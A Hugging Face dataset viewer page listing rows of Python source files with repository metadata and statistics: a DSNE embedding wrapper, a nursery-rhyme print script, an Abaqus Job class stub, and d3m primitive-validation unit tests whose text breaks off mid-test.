xszheng2020/the_stack_dedup_python_hits_7 · Datasets at Hugging Face

9727f52dbe9c36ae48009c70c1a9eb6e452e8e73

9,353

py

Python

dsne/_dsne.py

songtingstone/DSNE

edb173ba4eabdb599641fd253c8ee58b4c4b8eb4

[ "Apache-2.0" ]

1

2021-04-06T10:57:15.000Z

dsne/_dsne.py

songtingstone/dsne

edb173ba4eabdb599641fd253c8ee58b4c4b8eb4

[ "Apache-2.0" ]

null

dsne/_dsne.py

songtingstone/dsne

edb173ba4eabdb599641fd253c8ee58b4c4b8eb4

[ "Apache-2.0" ]

null

import numpy as np import scipy.linalg as la # dynamical lib from st_dsne import ST_DSNE def DSNE( data, V, Y, pca_d=None, perplexity=3.0, K = 16, threshold_V=1e-9, separate_threshold=1e-9, max_iter=1000, mom_switch_iter=250, momentum=0.5, final_momentum=0.8, eta=0.1, epsilon_kl=1e-9, epsilon_dsne=1e-9, with_norm=True, seed=None, random_state=None, copy_data=True, verbose=False, ): """ Run DSNE on data (data points), V (velocity), Y (map points). @param data The data points matrix, with shape (N,D). @param V The velocity matrix, with shape (N,D), each V_i with shape D is the velocity of point data_i. @param Y The low dimension map points matrix, with shape (N,d), each Y_i with shape d is the map points of point data_i. @param pca_d The dimensionality of data and V is reduced via PCA to this dimensionality, when D>5000, can use pca to reduce the dimension of data and V. @param perplexity The perplexity controls the effective number of neighbors. @param K The number of KNN neighbors, which is used to compute the similarity matrix P and Q. @param threshold_V A threshold. When max(abs(V_i)) < thershold_V, will omit to find its velocity embedding and set w_i=0 @param separate_threshold. A threshold. When we find the KNN neighbor of data_i, only when j satisfies || data_j - data_i||^2 > separate_threshold and max( abs(Y_j- Y_i) ) > separate_threshold will be considered as the neighbor of data_i. @param max_iter The max number of iteration to update the velocity embedding W @mom_switch_iter The momentum swith times. On iter in [0, mom_switch_iter) will use momentum, on iter in [mom_switch_iter, max_iter) will use final_momentum. @momentum The initial momentum scalar. @final_momentum The final momentum scalar. @eta Learning rate. Scalar. @epsilon_kl The threshold to check the convergence of velocity embedding for fixed \beta_Q each round @epsilon_dsne The threshold to check the convergence of DSNE. @with_norm Bool. If true, return the velocity embedding W wiht approximate norm based on data,V and Y; If false, return velocity embddding W with unit length for each W_i, i.e ||W_i|| =1 @seed Int. The random seed. @param random_state A numpy RandomState object; if None, use the numpy.random singleton. Init the RandomState with a fixed seed to obtain consistent results from run to run. @param copy_data Copy the data to prevent it from being modified by the C code. @param verbose Verbose output from the training process. """ N, D = data.shape N_V, D_V = V.shape N_Y, d = Y.shape if(not (N== N_Y and N_Y == N_V and D ==D_V)): print("The shape of data: {}, V: {}, Y: {} mismatch!".format(data.shape, V.shape, Y.shape)) raise if pca_d is None: if copy_data: X = np.copy(data) V = np.copy(V) Y = np.copy(Y) else: X = data else: # do PCA # data -= data.mean(axis=0) # working with covariance + (svd on cov.) is # much faster than svd on data directly. cov = np.dot(data.T, data) / N u, s, v = la.svd(cov, full_matrices=False) u = u[:, 0:pca_d] X = np.dot(data, u) V = np.dot(V, u) if seed is None: if random_state is None: seed = np.random.randint(2 ** 32 - 1) else: seed = random_state.randint(2 ** 32 - 1) if K is None: K = int(3*perplexity) if K > N - 1: if verbose: print("K: {} is too large, set it to N - 1".format(K, N-1)) K = N - 1 st_dsne= ST_DSNE() original_dtype = X.dtype dtype_changed = False if X.dtype is not np.dtype(np.float64): dtype_changed = True X = np.asarray(X, dtype=np.float64) if V.dtype is not np.dtype(np.float64): V = np.asarray(V, dtype=np.float64) dtype_changed = True if Y.dtype is not np.dtype(np.float64): Y = np.asarray(Y, dtype=np.float64) dtype_changed = True W = st_dsne.run(X, V, Y, N, K, X.shape[1], d, perplexity, threshold_V, separate_threshold, max_iter, mom_switch_iter, momentum, final_momentum, eta,epsilon_kl, epsilon_dsne, with_norm, seed, verbose) if dtype_changed: W = np.asarray(W, dtype=original_dtype) return W def DSNE_approximate( data, V, Y, pca_d=None, perplexity=3.0, K = 16, threshold_V=1e-9, separate_threshold=1e-9, with_norm = True, seed=None, random_state=None, copy_data=True, verbose=False, ): """ Run DSNE approximately on data (data points), V (velocity), Y (map points). @param data The data points matrix, with shape (N,D). @param V The velocity matrix, with shape (N,D), each V_i with shape D is the velocity of point data_i. @param Y The low dimension map points matrix, with shape (N,d), each Y_i with shape d is the map points of point data_i. @param pca_d The dimensionality of data and V is reduced via PCA to this dimensionality, when D>5000, can use pca to reduce the dimension of data and V. @param perplexity The perplexity controls the effective number of neighbors. @param K The number of KNN neighbors, which is used to compute the similarity matrix P and Q. @param threshold_V A threshold. When max(abs(V_i)) < thershold_V, will omit to find its velocity embedding and set w_i=0 @param separate_threshold. A threshold. When we find the KNN neighbor of data_i, only when j satisfies || data_j - data_i||^2 > separate_threshold and max( abs(Y_j- Y_i) ) > separate_threshold will be considered as the neighbor of data_i. @with_norm Bool. If true, return the velocity embedding W wiht approximate norm based on data,V and Y; If false, return velocity embddding W with unit length for each W_i, i.e ||W_i|| =1 @seed Int. The random seed. @param random_state A numpy RandomState object; if None, use the numpy.random singleton. Init the RandomState with a fixed seed to obtain consistent results from run to run. @param copy_data Copy the data to prevent it from being modified by the C code. @param verbose Verbose output from the training process. """ N, D = data.shape N_V, D_V = V.shape N_Y, d = Y.shape if (not (N == N_Y and N_Y == N_V and D == D_V)): print("The shape of data: {}, V: {}, Y: {} mismatch!".format(data.shape, V.shape, Y.shape)) raise if pca_d is None: if copy_data: X = np.copy(data) V = np.copy(V) Y = np.copy(Y) else: X = data else: # do PCA data -= data.mean(axis=0) # working with covariance + (svd on cov.) is # much faster than svd on data directly. cov = np.dot(data.T, data) / N u, s, v = la.svd(cov, full_matrices=False) u = u[:, 0:pca_d] X = np.dot(data, u) V = np.dot(V, u) if seed is None: if random_state is None: seed = np.random.randint(2 ** 32 - 1) else: seed = random_state.randint(2 ** 32 - 1) if K is None: K = int(6*perplexity) if K > N - 1: if verbose: print("K: {} is too large, set it to N - 1".format(K, N-1)) K = N - 1 st_dsne = ST_DSNE() original_dtype = X.dtype dtype_changed = False if X.dtype is not np.dtype(np.float64): dtype_changed = True X = np.asarray(X,dtype=np.float64) if V.dtype is not np.dtype(np.float64): V = np.asarray(V,dtype=np.float64) dtype_changed = True if Y.dtype is not np.dtype(np.float64): Y = np.asarray(Y,dtype=np.float64) dtype_changed = True # X, V, N, D, d, alpha, perplexity, theta, seed, verbose = False): # X, V, Y, N_full, D, d, perplexity, max_iter, mom_switch_iter, # momentum, final_momentum, eta, exact, seed, verbose # run(self, X, V, Y, N_full, D, d, perplexity, max_iter, threshold_V, # separate_threshold, mom_switch_iter, # momentum, final_momentum, eta, exact, seed, verbose=False) # print("perplexity", perplexity) W = st_dsne.run_approximate(X, V, Y, N, K, X.shape[1], d, perplexity, threshold_V, separate_threshold, with_norm, seed, verbose) if dtype_changed: W = np.asarray(W, dtype=original_dtype) return W

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3.754623

0.135135

0.015912

0.031824

0.018185

0.871377

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0.849593

0

0.016669

0.332941

9,353

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0.82946

0.51994

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0

1

0.014493

false

0

0.021739

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0.050725

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0

null

0

1

0

1

0

null

0

7

973b913ec9fdf8f5f07b1024ff42527dd81184bf

202

py

Python

print.py

vchatchai/python101

c2f1c7b0f62a4600f9c64af566dc5630742580f2

[ "Apache-2.0" ]

null

print.py

vchatchai/python101

c2f1c7b0f62a4600f9c64af566dc5630742580f2

[ "Apache-2.0" ]

null

print.py

vchatchai/python101

c2f1c7b0f62a4600f9c64af566dc5630742580f2

[ "Apache-2.0" ]

null

print("Twinkle, twinkle, little star, \n\tHow I wonder what you are! \n\t\tUp above the world so high, \n\t\tLike a diamond in the sky. \nTwinkle, twinkle, little star, \n\tHow I wonder what you are!")

101

201

0.717822

39

202

3.717949

0.615385

0.17931

0.234483

0.248276

0.537931

0

0.158416

202

1

202

0.852941

0

1

0.950495

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true

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null

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1

0

8

97ccf050cc1b352e077e6387f9313300c8b9aab1

14,118

py

Python

src/abaqus/Job/Job.py

Haiiliin/PyAbaqus

f20db6ebea19b73059fe875a53be370253381078

[ "MIT" ]

7

2022-01-21T09:15:45.000Z

2022-02-15T09:31:58.000Z

src/abaqus/Job/Job.py

Haiiliin/PyAbaqus

f20db6ebea19b73059fe875a53be370253381078

[ "MIT" ]

null

src/abaqus/Job/Job.py

Haiiliin/PyAbaqus

f20db6ebea19b73059fe875a53be370253381078

[ "MIT" ]

null

from abaqusConstants import * from .MessageArray import MessageArray class Job: """The Job object is the abstract base type for other Job objects. The Job object has no explicit constructor. The methods and members of the Job object are common to all objects derived from Job. Attributes ---------- name: str A String specifying the name of the new job. The name must be a valid Abaqus/:py:class:`~.CAE` object name. type: SymbolicConstant A SymbolicConstant specifying :py:class:`~.the` type of job. Possible values are ANALYSIS, SYNTAXCHECK, RECOVER, and RESTART. The default value is ANALYSIS.If :py:class:`~.the` object has :py:class:`~.the` type JobFromInputFile, **type=RESTART** is not available. waitHours: int An Int specifying the number of hours to wait before submitting the job. This argument is ignored if **queue** is set. The default value is 0.This argument works in conjunction with **waitMinutes**. **waitHours** and **atTime** are mutually exclusive. waitMinutes: int An Int specifying the number of minutes to wait before submitting the job. This argument is ignored if **queue** is set. The default value is 0.This argument works in conjunction with **waitHours**. **waitMinutes** and **atTime** are mutually exclusive. numCpus: int An Int specifying the number of CPUs to use for this analysis if parallel processing is available. Possible values are **numCpus** >> 0. The default value is 1. memory: int An Int specifying the amount of memory available to Abaqus analysis. The value should be expressed in the units supplied in **memoryUnits**. The default value is 90. memoryUnits: SymbolicConstant A SymbolicConstant specifying the units for the amount of memory used in an Abaqus analysis. Possible values are PERCENTAGE, MEGA_BYTES, and GIGA_BYTES. The default value is PERCENTAGE. getMemoryFromAnalysis: Boolean A Boolean specifying whether to retrieve the recommended memory settings from the last datacheck or analysis run and use those values in subsequent submissions. The default value is ON. explicitPrecision: SymbolicConstant A SymbolicConstant specifying whether to use the double precision version of Abaqus/Explicit. Possible values are SINGLE, FORCE_SINGLE, DOUBLE, DOUBLE_CONSTRAINT_ONLY, and DOUBLE_PLUS_PACK. The default value is SINGLE. nodalOutputPrecision: SymbolicConstant A SymbolicConstant specifying the precision of the nodal output written to the output database. Possible values are SINGLE and FULL. The default value is SINGLE. parallelizationMethodExplicit: SymbolicConstant A SymbolicConstant specifying the parallelization method for Abaqus/Explicit. This value is ignored for Abaqus/Standard. Possible values are DOMAIN and LOOP. The default value is DOMAIN. numDomains: int An Int specifying the number of domains for parallel execution in Abaqus/Explicit. When **parallelizationMethodExplicit=DOMAIN**, **numDomains** must be a multiple of **numCpus**. The default value is 1. activateLoadBalancing: Boolean A Boolean specifying whether to activate dyanmic load balancing for jobs running on multiple processors with multiple domains in Abaqus/Explicit. The default value is OFF. multiprocessingMode: SymbolicConstant A SymbolicConstant specifying whether an analysis is decomposed into threads or into multiple processes that communicate through a message passing interface (MPI). Possible values are DEFAULT, THREADS,MPI, and HYBRID. The default value is DEFAULT. numThreadsPerMpiProcess: int An Int specifying the number of threads per MPI process to use for this analysis if parallel processing is available. Possible values are **numThreadsPerMpiProcess** >> 0. The default value is 1. analysis: SymbolicConstant A SymbolicConstant specifying whe:py:class:`~.the`r :py:class:`~.the` job will be analyzed by Abaqus/Standard or Abaqus/Explicit. Possible values are STANDARD, EXPLICIT, and UNKNOWN.If :py:class:`~.the` object has :py:class:`~.the` type JobFromInputFile, **analysis=UNKNOWN**. status: SymbolicConstant A SymbolicConstant specifying the status of the analysis. Possible values are SUBMITTED, RUNNING, ABORTED, TERMINATED, COMPLETED, CHECK_RUNNING, and CHECK_COMPLETED.If the **message** member is empty, **status** is set to NONE. queue: str A String specifying the name of the queue to which to submit the job. The default value is an empty string.Note:You can use the **queue** argument when creating a :py:class:`~abaqus.Job.Job.Job` object on a Windows workstation; however, remote queues are available only on Linux platforms. atTime: str A String specifying the time at which to submit the job. If **queue** is empty, the string syntax must be valid for the Linux `at` command. If **queue** is set, the syntax must be valid according to the system administrator. The default value is an empty string.Note:You can use the **atTime** argument when creating a :py:class:`~abaqus.Job.Job.Job` object on a Windows workstation; however, the `at` command is available only on Linux platforms. scratch: str A String specifying the location of the scratch directory. The default value is an empty string. userSubroutine: str A String specifying the file containing the user's subroutine definitions. The default value is an empty string. messages: MessageArray A :py:class:`~abaqus.Job.MessageArray.MessageArray` object specifying the messages received during an analysis. environment: tuple A tuple of Strings specifying the environment variables and their values. licenseType: SymbolicConstant A SymbolicConstant specifying the type of license type being used in the case of the DSLS SimUnit license model. Possible values are DEFAULT, TOKEN, and CREDIT. The default value is DEFAULT.If the license model is not the DSLS SimUnit, the licenseType is not available. Notes ----- This object can be accessed by: .. code-block:: python import job mdb.coexecutions[name].jobs[name] mdb.jobs[name] The corresponding analysis keywords are: - HEADING - PREPRINT """ # A String specifying the name of the new job. The name must be a valid Abaqus/CAE object # name. name: str = '' # A SymbolicConstant specifying the type of job. Possible values are ANALYSIS, # SYNTAXCHECK, RECOVER, and RESTART. The default value is ANALYSIS.If the object has the # type JobFromInputFile, *type*=RESTART is not available. type: SymbolicConstant = ANALYSIS # An Int specifying the number of hours to wait before submitting the job. This argument # is ignored if *queue* is set. The default value is 0.This argument works in conjunction # with *waitMinutes*. *waitHours* and *atTime* are mutually exclusive. waitHours: int = 0 # An Int specifying the number of minutes to wait before submitting the job. This argument # is ignored if *queue* is set. The default value is 0.This argument works in conjunction # with *waitHours*. *waitMinutes* and *atTime* are mutually exclusive. waitMinutes: int = 0 # An Int specifying the number of CPUs to use for this analysis if parallel processing is # available. Possible values are *numCpus* >> 0. The default value is 1. numCpus: int = 1 # An Int specifying the amount of memory available to Abaqus analysis. The value should be # expressed in the units supplied in *memoryUnits*. The default value is 90. memory: int = 90 # A SymbolicConstant specifying the units for the amount of memory used in an Abaqus # analysis. Possible values are PERCENTAGE, MEGA_BYTES, and GIGA_BYTES. The default value # is PERCENTAGE. memoryUnits: SymbolicConstant = PERCENTAGE # A Boolean specifying whether to retrieve the recommended memory settings from the last # datacheck or analysis run and use those values in subsequent submissions. The default # value is ON. getMemoryFromAnalysis: Boolean = ON # A SymbolicConstant specifying whether to use the double precision version of # Abaqus/Explicit. Possible values are SINGLE, FORCE_SINGLE, DOUBLE, # DOUBLE_CONSTRAINT_ONLY, and DOUBLE_PLUS_PACK. The default value is SINGLE. explicitPrecision: SymbolicConstant = SINGLE # A SymbolicConstant specifying the precision of the nodal output written to the output # database. Possible values are SINGLE and FULL. The default value is SINGLE. nodalOutputPrecision: SymbolicConstant = SINGLE # A SymbolicConstant specifying the parallelization method for Abaqus/Explicit. This value # is ignored for Abaqus/Standard. Possible values are DOMAIN and LOOP. The default value # is DOMAIN. parallelizationMethodExplicit: SymbolicConstant = DOMAIN # An Int specifying the number of domains for parallel execution in Abaqus/Explicit. When # *parallelizationMethodExplicit*=DOMAIN, *numDomains* must be a multiple of *numCpus*. # The default value is 1. numDomains: int = 1 # A Boolean specifying whether to activate dyanmic load balancing for jobs running on # multiple processors with multiple domains in Abaqus/Explicit. The default value is OFF. activateLoadBalancing: Boolean = OFF # A SymbolicConstant specifying whether an analysis is decomposed into threads or into # multiple processes that communicate through a message passing interface (MPI). Possible # values are DEFAULT, THREADS,MPI, and HYBRID. The default value is DEFAULT. multiprocessingMode: SymbolicConstant = DEFAULT # An Int specifying the number of threads per MPI process to use for this analysis if # parallel processing is available. Possible values are *numThreadsPerMpiProcess* >> 0. # The default value is 1. numThreadsPerMpiProcess: int = 1 # A SymbolicConstant specifying whether the job will be analyzed by Abaqus/Standard or # Abaqus/Explicit. Possible values are STANDARD, EXPLICIT, and UNKNOWN.If the object has # the type JobFromInputFile, *analysis*=UNKNOWN. analysis: SymbolicConstant = None # A SymbolicConstant specifying the status of the analysis. Possible values are SUBMITTED, # RUNNING, ABORTED, TERMINATED, COMPLETED, CHECK_RUNNING, and CHECK_COMPLETED.If the # *message* member is empty, *status* is set to NONE. status: SymbolicConstant = None # A String specifying the name of the queue to which to submit the job. The default value # is an empty string.Note:You can use the *queue* argument when creating a Job object on a # Windows workstation; however, remote queues are available only on Linux platforms. queue: str = '' # A String specifying the time at which to submit the job. If *queue* is empty, the string # syntax must be valid for the Linux `at` command. If *queue* is set, the syntax must be # valid according to the system administrator. The default value is an empty # string.Note:You can use the *atTime* argument when creating a Job object on a Windows # workstation; however, the `at` command is available only on Linux platforms. atTime: str = '' # A String specifying the location of the scratch directory. The default value is an empty # string. scratch: str = '' # A String specifying the file containing the user's subroutine definitions. The default # value is an empty string. userSubroutine: str = '' # A MessageArray object specifying the messages received during an analysis. messages: MessageArray = MessageArray() # A tuple of Strings specifying the environment variables and their values. environment: tuple = () # A SymbolicConstant specifying the type of license type being used in the case of the # DSLS SimUnit license model. Possible values are DEFAULT, TOKEN, and CREDIT. The default # value is DEFAULT.If the license model is not the DSLS SimUnit, the licenseType is not # available. licenseType: SymbolicConstant = DEFAULT def kill(self): """This method kills the analysis of a job. """ pass def submit(self, consistencyChecking: Boolean = ON, datacheckJob: Boolean = False, continueJob: Boolean = False): """This method submits a job for analysis. Parameters ---------- consistencyChecking A Boolean specifying whether to perform consistency checking for the job. The default value is ON. It is not recommended to turn the consistency checking off unless you are absolutely sure the model is consistent. datacheckJob A Boolean specifying whether to run the job as a datacheck analysis. The default value is False. The datacheckJob and continueJob arguments cannot both be True. continueJob A Boolean specifying whether to run the job as a continuation analysis. The default value is False. The datacheckJob and continueJob arguments cannot both be True. """ pass def waitForCompletion(self): """This method interrupts the execution of the script until the end of the analysis. If you call the waitForCompletion method and the *status* member is neither SUBMITTED nor RUNNING, Abaqus assumes the analysis has either completed or aborted and returns immediately. """ pass def clearMessage(self): """This method clears *messages* and sets the *status* to NONE. """ pass

53.075188

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14,118

5.422558

0.148948

0.029956

0.061206

0.069367

0.80633

0.788913

0.777369

0.761843

0.753185

0.740645

0

0.002313

0.234311

14,118

265

127

53.275472

0.927197

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false

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9

8ae6e7477d230b03f00803612095e5936755b42a

39,189

py

Python

tests/test_primitive_validation.py

tods-doc/tamu_d3m

a6a05f022ea60ab9787cbd89659ea8e0062ca22b

[ "Apache-2.0" ]

null

tests/test_primitive_validation.py

tods-doc/tamu_d3m

a6a05f022ea60ab9787cbd89659ea8e0062ca22b

[ "Apache-2.0" ]

null

tests/test_primitive_validation.py

tods-doc/tamu_d3m

a6a05f022ea60ab9787cbd89659ea8e0062ca22b

[ "Apache-2.0" ]

null

import typing import unittest import logging from d3m import container, exceptions, utils from d3m.metadata import base as metadata_base, hyperparams, params from d3m.primitive_interfaces import base, transformer, unsupervised_learning Inputs = container.List Outputs = container.List class Hyperparams(hyperparams.Hyperparams): pass class TestPrimitiveValidation(unittest.TestCase): def test_multi_produce_missing_argument(self): with self.assertRaisesRegex(exceptions.InvalidPrimitiveCodeError, '\'multi_produce\' method arguments have to be an union of all arguments of all produce methods, but it does not accept all expected arguments'): # Silence any validation warnings. with utils.silence(): class TestPrimitive(transformer.TransformerPrimitiveBase[Inputs, Outputs, Hyperparams]): metadata = metadata_base.PrimitiveMetadata({ 'id': '67568a80-dec2-4597-a10f-39afb13d3b9c', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'd3m.primitives.test.TestPrimitive', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.NUMERICAL_METHOD, ], 'primitive_family': metadata_base.PrimitiveFamily.OPERATOR, }) def produce(self, *, inputs: Inputs, second_inputs: Inputs, timeout: float = None, iterations: int = None) -> base.CallResult[Outputs]: pass def test_fit_multi_produce_missing_argument(self): with self.assertRaisesRegex(exceptions.InvalidPrimitiveCodeError, '\'fit_multi_produce\' method arguments have to be an union of all arguments of \'set_training_data\' method and all produce methods, but it does not accept all expected arguments'): # Silence any validation warnings. with utils.silence(): class TestPrimitive(transformer.TransformerPrimitiveBase[Inputs, Outputs, Hyperparams]): metadata = metadata_base.PrimitiveMetadata({ 'id': '67568a80-dec2-4597-a10f-39afb13d3b9c', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'd3m.primitives.test.TestPrimitive', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.NUMERICAL_METHOD, ], 'primitive_family': metadata_base.PrimitiveFamily.OPERATOR, }) def produce(self, *, inputs: Inputs, second_inputs: Inputs, timeout: float = None, iterations: int = None) -> base.CallResult[Outputs]: pass def multi_produce(self, *, produce_methods: typing.Sequence[str], inputs: Inputs, second_inputs: Inputs, timeout: float = None, iterations: int = None) -> base.MultiCallResult: pass def test_multi_produce_extra_argument(self): with self.assertRaisesRegex(exceptions.InvalidPrimitiveCodeError, '\'multi_produce\' method arguments have to be an union of all arguments of all produce methods, but it accepts unexpected arguments'): # Silence any validation warnings. with utils.silence(): class TestPrimitive(transformer.TransformerPrimitiveBase[Inputs, Outputs, Hyperparams]): metadata = metadata_base.PrimitiveMetadata({ 'id': '67568a80-dec2-4597-a10f-39afb13d3b9c', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'd3m.primitives.test.TestPrimitive', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.NUMERICAL_METHOD, ], 'primitive_family': metadata_base.PrimitiveFamily.OPERATOR, }) def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> base.CallResult[Outputs]: pass def multi_produce(self, *, produce_methods: typing.Sequence[str], inputs: Inputs, second_inputs: Inputs, timeout: float = None, iterations: int = None) -> base.MultiCallResult: pass def test_fit_multi_produce_extra_argument(self): with self.assertRaisesRegex(exceptions.InvalidPrimitiveCodeError, '\'fit_multi_produce\' method arguments have to be an union of all arguments of \'set_training_data\' method and all produce methods, but it accepts unexpected arguments'): # Silence any validation warnings. with utils.silence(): class TestPrimitive(transformer.TransformerPrimitiveBase[Inputs, Outputs, Hyperparams]): metadata = metadata_base.PrimitiveMetadata({ 'id': '67568a80-dec2-4597-a10f-39afb13d3b9c', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'd3m.primitives.test.TestPrimitive', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.NUMERICAL_METHOD, ], 'primitive_family': metadata_base.PrimitiveFamily.OPERATOR, }) def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> base.CallResult[Outputs]: pass def fit_multi_produce(self, *, produce_methods: typing.Sequence[str], inputs: Inputs, second_inputs: Inputs, timeout: float = None, iterations: int = None) -> base.MultiCallResult: pass def test_produce_using_produce_methods(self): with self.assertRaisesRegex(exceptions.InvalidPrimitiveCodeError, 'Produce method cannot use \'produce_methods\' argument'): # Silence any validation warnings. with utils.silence(): class TestPrimitive(transformer.TransformerPrimitiveBase[Inputs, Outputs, Hyperparams]): metadata = metadata_base.PrimitiveMetadata({ 'id': '67568a80-dec2-4597-a10f-39afb13d3b9c', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'd3m.primitives.test.TestPrimitive', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.NUMERICAL_METHOD, ], 'primitive_family': metadata_base.PrimitiveFamily.OPERATOR, }) def produce(self, *, inputs: Inputs, produce_methods: typing.Sequence[str], timeout: float = None, iterations: int = None) -> base.CallResult[Outputs]: pass def test_hyperparams_to_tune(self): with self.assertRaisesRegex(exceptions.InvalidMetadataError, 'Hyper-parameter in \'hyperparams_to_tune\' metadata does not exist'): # Silence any validation warnings. with utils.silence(): class TestPrimitive(transformer.TransformerPrimitiveBase[Inputs, Outputs, Hyperparams]): metadata = metadata_base.PrimitiveMetadata({ 'id': '67568a80-dec2-4597-a10f-39afb13d3b9c', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'd3m.primitives.test.TestPrimitive', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.NUMERICAL_METHOD, ], 'primitive_family': metadata_base.PrimitiveFamily.OPERATOR, 'hyperparams_to_tune': [ 'foobar', ] }) def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> base.CallResult[Outputs]: pass def test_inputs_across_samples(self): with self.assertRaisesRegex(exceptions.InvalidPrimitiveCodeError, 'Method \'.*\' has an argument \'.*\' set as computing across samples, but it does not exist'): # Silence any validation warnings. with utils.silence(): class TestPrimitive(transformer.TransformerPrimitiveBase[Inputs, Outputs, Hyperparams]): metadata = metadata_base.PrimitiveMetadata({ 'id': '67568a80-dec2-4597-a10f-39afb13d3b9c', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'd3m.primitives.test.TestPrimitive', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.NUMERICAL_METHOD, ], 'primitive_family': metadata_base.PrimitiveFamily.OPERATOR, 'hyperparams_to_tune': [ 'foobar', ] }) @base.inputs_across_samples('foobar') def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> base.CallResult[Outputs]: pass with self.assertRaisesRegex(exceptions.InvalidPrimitiveCodeError, 'Method \'.*\' has an argument \'.*\' set as computing across samples, but it is not a PIPELINE argument'): # Silence any validation warnings. with utils.silence(): class TestPrimitive(transformer.TransformerPrimitiveBase[Inputs, Outputs, Hyperparams]): metadata = metadata_base.PrimitiveMetadata({ 'id': '67568a80-dec2-4597-a10f-39afb13d3b9c', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'd3m.primitives.test.TestPrimitive', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.NUMERICAL_METHOD, ], 'primitive_family': metadata_base.PrimitiveFamily.OPERATOR, 'hyperparams_to_tune': [ 'foobar', ] }) @base.inputs_across_samples('timeout') def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> base.CallResult[Outputs]: pass def test_can_detect_too_many_package_components(self): logger = logging.getLogger('d3m.metadata.base') # Ensure a warning message is generated for too many package components with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: metadata_base.PrimitiveMetadata()._validate_namespace_compliance('d3m.primitives.classification.random_forest.SKLearn.toomany', metadata_base.PrimitiveFamily.CLASSIFICATION) self.assertEqual(len(cm.records), 1) self.assertEqual(cm.records[0].msg, "%(python_path)s: Primitive's Python path does not adhere to d3m.primitives namespace specification. " "Reason: must have 5 segments.") # Ensure a warning message is NOT generated for an acceptable number of components with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_namespace_compliance('d3m.primitives.classification.random_forest.SKLearn', metadata_base.PrimitiveFamily.CLASSIFICATION) self.assertEqual(len(cm.records), 1) def test_with_string_instead_of_enum(self): logger = logging.getLogger(metadata_base.__name__) # Ensure a warning message is NOT generated for an acceptable number of components with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_namespace_compliance('d3m.primitives.classification.random_forest.SKLearn', metadata_base.PrimitiveFamily.CLASSIFICATION.name) self.assertEqual(len(cm.records), 1) def test_can_detect_too_few_package_components(self): logger = logging.getLogger(metadata_base.__name__) # Ensure a warning message is generated for too few package components with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: metadata_base.PrimitiveMetadata()._validate_namespace_compliance('d3m.primitives.classification.too_few', metadata_base.PrimitiveFamily.CLASSIFICATION) self.assertEqual(len(cm.records), 1) self.assertEqual(cm.records[0].msg, "%(python_path)s: Primitive's Python path does not adhere to d3m.primitives namespace specification. " "Reason: must have 5 segments.") # Ensure a warning message is NOT generated for an acceptable number of components with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_namespace_compliance('d3m.primitives.classification.random_forest.SKLearn', metadata_base.PrimitiveFamily.CLASSIFICATION) self.assertEqual(len(cm.records), 1) def test_can_detect_bad_primitive_family(self): logger = logging.getLogger(metadata_base.__name__) # Ensure a warning message is generated for a bad primitive family with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: metadata_base.PrimitiveMetadata()._validate_namespace_compliance('d3m.primitives.bad_family.random_forest.SKLearn', metadata_base.PrimitiveFamily.CLASSIFICATION) self.assertEqual(len(cm.records), 1) self.assertEqual(cm.records[0].msg, "%(python_path)s: Primitive's Python path does not adhere to d3m.primitives namespace specification." " Reason: primitive family segment must match primitive's primitive family.") # Ensure a warning message is NOT generated for an acceptable primitive family with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_namespace_compliance('d3m.primitives.classification.random_forest.SKLearn', metadata_base.PrimitiveFamily.CLASSIFICATION) self.assertEqual(len(cm.records), 1) def test_can_detect_bad_primitive_name(self): logger = logging.getLogger(metadata_base.__name__) # Ensure a warning message is generated for a bad primitive name with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: metadata_base.PrimitiveMetadata()._validate_namespace_compliance('d3m.primitives.classification.bad_name.SKLearn', metadata_base.PrimitiveFamily.CLASSIFICATION) self.assertEqual(len(cm.records), 1) self.assertEqual(cm.records[0].msg, "%(python_path)s: Primitive's Python path does not adhere to d3m.primitives namespace specification. " "Reason: must have a known primitive name segment.") # Ensure a warning message is NOT generated for an acceptable primitive name with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_namespace_compliance('d3m.primitives.classification.random_forest.SKLearn', metadata_base.PrimitiveFamily.CLASSIFICATION) self.assertEqual(len(cm.records), 1) def test_can_detect_kind_not_capitalized(self): logger = logging.getLogger(metadata_base.__name__) # Ensure a warning message is generated for a primitive kind not capitalized properly with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: metadata_base.PrimitiveMetadata()._validate_namespace_compliance('d3m.primitives.classification.random_forest.sklearn', metadata_base.PrimitiveFamily.CLASSIFICATION) self.assertEqual(len(cm.records), 1) self.assertEqual(cm.records[0].msg, "%(python_path)s: Primitive's Python path does not adhere to d3m.primitives namespace specification. " "Reason: primitive kind segment must start with upper case.") # Ensure a warning message is NOT generated for an acceptable primitive kind with 